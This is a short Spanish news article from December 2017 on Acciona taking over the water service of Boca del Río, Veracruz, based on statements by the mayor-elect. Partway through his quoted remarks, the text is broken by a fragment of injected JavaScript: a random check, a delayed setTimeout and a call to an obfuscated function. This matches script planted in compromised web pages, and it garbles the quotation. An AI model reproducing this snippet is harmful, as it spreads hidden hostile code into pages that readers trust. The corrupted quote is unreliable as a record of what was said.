Empresa Acciona administrará servicio de agua en Boca del Río

4 diciembre, 2017

Adriana Muñoz Cabrera. Veracruz. Acciona es la empresa que administrará el servicio de agua potable en el municipio de Boca del Río, confirmó el alcalde electo, Humberto Alonso Morelli.

La inversión estimada es de 2 mil millones de pesos y se calculó con base en el grave rezago que se tiene en materia hidráulica.

“Estamos hablandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}ando de casi 2 mil millones de pesos, es una inversión muy importante, traemos un rezago fuerte en tema de agua, sobre todo  en suministro de agua potable, hay muchas deficiencias con la planta potabilizadora del Tejar”, enfatizó Alonso Morelli.

En entrevista, confirmó que ya dieron su voto de confianza a la empresa que se encargará del abasto de agua potable y saneamiento en la ciudad.

Alonso Morelli rechazó que Acciona pueda tener el mismo fin que Grupo MAS, ya que, dijo, esta compañía sí tiene prestigio internacional.

“Ya tengo yo el bosquejo completo del contrato de esta licitación y creo que está muy interesante, el compromiso de inversión por parte de la empresa es muy fuerte”, agregó.

El exdiputado federal manifestó que Acciona sí presentó casos de éxito en varias partes del mundo y tiene claro que las metas son ambiciosas para mejorar el servicio y calidad del agua potable que exige la población en Boca del Río.